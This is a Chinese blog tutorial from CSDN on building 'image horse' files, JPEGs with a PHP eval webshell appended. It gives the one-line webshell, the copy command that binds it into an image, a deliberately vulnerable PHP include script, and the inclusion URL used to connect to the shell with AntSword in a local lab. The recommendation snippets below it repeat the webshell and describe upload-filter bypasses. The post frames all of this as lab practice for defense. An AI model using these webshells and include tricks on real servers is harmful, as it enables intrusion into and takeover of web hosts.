关于图片码的制作与使用

最新推荐文章于 2024-05-20 09:27:26 发布
最新推荐文章于 2024-05-20 09:27:26 发布
阅读量666 收藏 1
点赞数 2
文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_73180072/article/details/134185746
版权

中华人民共和国网络安全法及本人免责声明

第二十七条:任何个人和组织不得从事非法侵入他人网络、干扰他人网络正常功能、窃取网络数据等危害网络安全的活动;不得提供专门用于从事侵入网络、干扰网络正常功能及防护措施、窃取网络数据等危害网络安全活动的程序和工具;明知他人从事危害网络安全的活动,不得为其提供技术支持、广告推广、支付结算等帮助。

    本人所有文章均为技术分享,均用于防御为目的的记录,所有操作均在实验环境下进行,读者请勿用于其他用途,否则后果自负。

一、图片码的制作

方式一:将图片用notepad++打开,在最后面写入一句话木马

<?php @eval($_POST['wenjian123abd']);?>

方式二:用winhex打开图片,末尾添加一句话木马

方式三:在windows的cmd中执行

copy 1.jpg/b+2.php/a 2.jpg

 1.jpg是你要用的图片名

2.php是你要用的一句话木马名

2.jpg是生成的图片马名称

 本来是两个文件,执行命令后会生成一个新文件,新文件就是图片马

二、图片马的使用

图片马的使用前提是系统存在文件包含漏洞

这里我们自己写一个php文件放入靶场www目录中,模拟文件包含漏洞

<?php
$file = $_GET['file'];
include $file;
?>

 在蚁剑中输入payload

http://127.0.0.1/pikachu/vul/fileinclude.php?file=unsafeupload/uploads/3.jpg

测试图片马,三种方式均连接成功

TIME908
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
一句话图片
Hydra的博客
11-06 5423
做到了一个上传绕过的题,随便不管用,但复习一下 windows下,在cmd中通过copy中可以实现文件捆绑, 利用 命令 copy 1.jpg/b+1.php 2.php.jpg ||b是二进制,a为ascii 可以实现图片中藏马, 如果要绕过前端上传的,可以使用00截断,利用bp抓包修改.为00 在上传的时候,当文件系统读到”0X00″时,会认为文件已经结束,从而将2.php...
图片
jayluns的专栏
05-08 401
直接切入主题,2年前写的一个图片,记录一下。 1 生成图片主类:RandomCode [code="java"] package com.gpdi.util; /** * @Description: 图片 * @author: jy * @CreateTime: Sep 19, 2010 10:01:46 PM * */ import java.awt....
生成图片
最新发布
2302_81133665的博客
05-20 381
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档windows系统和linux系统图片马的生成@-windows系统-Linux系统。
图片生成
huhu518420的博客
05-25 1524
1.项目结构 2.类的内容 2.1 Digest package com.rtsm.zhjs.background.common.imgcode; /** * @author loki * @date 2018-04-27 上午10:16 **/ import org.slf4j.Logger; import org.slf4j.LoggerFactory; import ...
web安全-文件上传漏洞-图片制作-相关php函数讲解-upload靶场通关详细教学(3)
ran的博客
01-30 6268
getimagesize() 函数将测定任何 GIF,JPG,PNG,SWF,SWC,PSD,TIFF,BMP,IFF,JP2,JPX,JB2,JPC,XBM 或 WBMP 图像文件的大小并返回图像的尺寸以及文件类型及图片高度与宽度。的知识,比如我们平时在进行文件上传时,在我们上传文件后,网站会对图片进行二次处理(格式、尺寸、保存、删除要求等),服务器会把里面的内容进行替换更新,处理完成后,根据我们原有的图片生成一个新的图片(标准化)并放到网站对应的标签进行显示。
图片木马制作方法详细教程
爱吃仡坨的Blog
10-24 9309
将写的木马插入到图片中,之后配合解析漏洞.htaccess等,对图片马进行解析,从而执行图片中的恶意代;# 因此 服务器是对文件后缀来对文件进行解析的,所以我们可以通过修改文件后缀来对图片进行访问。此时生成的是图片文件,我们将后缀改为zip时,任然可以读取压缩包文件中的内容。先将一张图片放到PS中,之后点击左上角文件——>文件简介。通过十六进制编辑器,将一句话木马写入图片中。通过图片隐藏信息,是一个合成的过程。最后将带有一句话木马的图片导出。图片越小的文件,制作工艺越纯良。把压缩包放到图片中,进行合成。
文件上传漏洞进阶教程/白名单绕过/图片制作/图片马执行
ChenD的学习笔记
10-23 7533
文件上传漏洞进阶教程/白名单绕过/图片制作/图片马执行
高清黑白头PPT背景图片
07-16
制作高质量的演示文稿时,选择合适的背景图片至关重要,因为它能够为内容增添视觉吸引力,同时也能强化主题的表达。本资源提供了一张名为“高清黑白头PPT背景图片”的独特设计,适用于需要展现自然、宁静或者...
收款三合一制作生成系统
03-19
【收款三合一制作生成系统】是一个用于整合QQ、微信和支付宝收款的在线工具,旨在为用户提供便捷的多平台收款管理服务。这个系统具备自适应性,能够根据不同的设备屏幕尺寸进行优化显示,确保在各种终端上的...
二维图片扫描与制作软件for PC
11-06
二维图片扫描与制作软件在PC上的应用已经成为日常生活和工作中不可或缺的一部分。随着移动互联网的快速发展,二维作为信息传递的快捷方式,被广泛应用于网址链接、电子名片、产品追溯、支付凭证等多个场景。对于...
web网页设计与制作期末作品期末考试项目
02-08
本人大学web网页设计与制作课程总成绩94.5。本项目制作占期末65%,预估获得满分,最多扣了三五分。 压缩包内涵实现该项目所有素材及完整代,可直接使用! (因上传资源不可加图片 详细效果点我头像 web专栏里发布...
高清黑白头背景图片PPT模板
03-20
除了图片文件,压缩包内还包含"使用帮助.txt",这可能是为用户提供如何下载、安装和应用模板的指导文档,对于不熟悉PPT操作的用户来说,这样的帮助文档是非常有用的。"谷普下载.url"和"说明.url"可能是指向更多下载...
如何制作图片一句话木马
qq_52676257的博客
03-09 2957
如何制作图片一句话木马 新建一个文件夹,在其中放入一张图片图片后缀名只要是图片的那几个后缀名即可)和一句话木马,例如: 其中的一句话木马为 <?php @eval($_POST["value"]);?> 再写入一个cmd的bat文件 然后打开bat文件 并输入copy tp.jpg/b+yjh.php shell.jpg 这样就会在先前所建的文件夹里,得到了一张新的图片,我命名为了shell.jpg,这时我们就得到了所需要的图片一句话木马。 ...
文件上传漏洞—一句话图片制作
weixin_44431280的博客
02-28 9442
文件上传漏洞—一句话图片制作 提要:在文件上传漏洞中,通常需要上传脚本类型的文件至服务端执行,获取WebShell,但是通常网站会严格过滤脚本类型的文件,这个时候便可以通过图片马来突破。 简介:就是在图片格式文件(JPG,PNG和GIF等)中隐藏一句话木马,利用文件包含漏洞,Web容器解析漏洞和.htaccess文件解析成对应的脚本,达到可以被Web容器执行的效果。 利用场景:因为图片格式的文件默认是不会被Web容器解析的,所以通过需要借助到文件包含漏洞,Web容器解析漏洞和.htaccess文件。 图片
文件上传之图片马混淆绕过与条件竞争
PiKanZiGui的博客
09-10 280
条件竞争型的漏洞在很多漏洞中都有涉及,在文件上传中造成这种漏洞的原因是代中是先保存上传的文件在服务器上,然后验证再删除的,这就会造成攻击者可以利用文件被保存在服务器上与被删除的时间间隙来访问文件,然后重新生成了一个新木马。我们可以直接上传一个有写功能的php文件,然后bp抓包,一直发包,同时一直访问刚刚上传的php文件,总有一次会成功生成一个新的木马。//显示二次渲染后的图片使用用户上传图片生成的新图片)// 获得上传文件的基本信息,文件名,类型,大小,临时文件路径。//使用上传的图片生成新的图片
关于图片马的正确用法
热门推荐
qq_42311391的博客
04-23 4万+
图片,有木马,然而菜刀连接不上,你绝望吗?不怕今天我会教大家的。 我们先看一下源吧,过关方式也是叫我们上传图片马。。。 然后我还要说吗一下,图片马不是一张木马图片一个菜刀就可以了的。还需要一个漏洞,叫做文件包含漏洞。。。这个漏洞原理呢 一:准备图片马 需要用到DOS指令 Bash copy 001.jpeg/b + test.php/a 2.jpg 这个...
图片马利用的三种方式
weixin_48435065的博客
09-30 3005
user.ini实际上就是一个可以由用户“自定义”的php.ini,我们可以自定义除了PHP_INI_SYSTEM以外的模式,在执行php代之前,系统会对.user.ini先做一个执行,然后才执行其他的php文件。满足.user.ini、1.jpg和1.php(任意php文件)这三个文件在同一目录下,则相当于在1.php文件里插入了包含语句require('1.png'),进行了文件包含。首先上传图片马,利用文件包含上传的图片马,使得php文件执行,然后使用菜刀连接。// 1.php(任意php文件)
一句话图片木马的制作
netuser1937的博客
12-19 1万+
一句话图片木马的制作
简单图片木马的生成与利用
Deeeelete的博客
02-08 9774
首先准备一个图片,还有一个脚本,这里的php文件就采用了最简单的一句话木马,具体内容为<?php @eval($_POST['a']);?>,确保两个文件在同一个路径下。2.紧着着按住shift键,然后点击鼠标右键,这时候就会出现“在此处打开powershell”的字眼,点击 进入蓝色窗口,其实我们想通过这样来进入cmd,所以我们用命令start cmd;进入 3.在cmd中输入 c...
使用html制作登录跳转快捷登录二维
05-29
使用HTML制作登录跳转快捷登录二维,你需要先获取二维图片的链接地址,然后将其插入到HTML代中。以下是一个示例代,可以将其修改以适应你的需求: ```html <!DOCTYPE html> <html> <head> <title>登录页面</title> </head> <body> <h1>密登录</h1> <form> <label for="username">用户名:</label> <input type="text" id="username" name="username"><br><br> <label for="password">密:</label> <input type="password" id="password" name="password"><br><br> <input type="submit" value="登录"> </form> <h1>快捷登录</h1> <img src="https://example.com/qrcode.jpg" alt="快捷登录二维"> </body> </html> ``` 在上面的代中,我们使用了`<img>`标签来插入二维图片,其中`src`属性的值为二维图片的链接地址。你需要将该链接地址替换为你自己的快捷登录二维图片链接地址即可。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值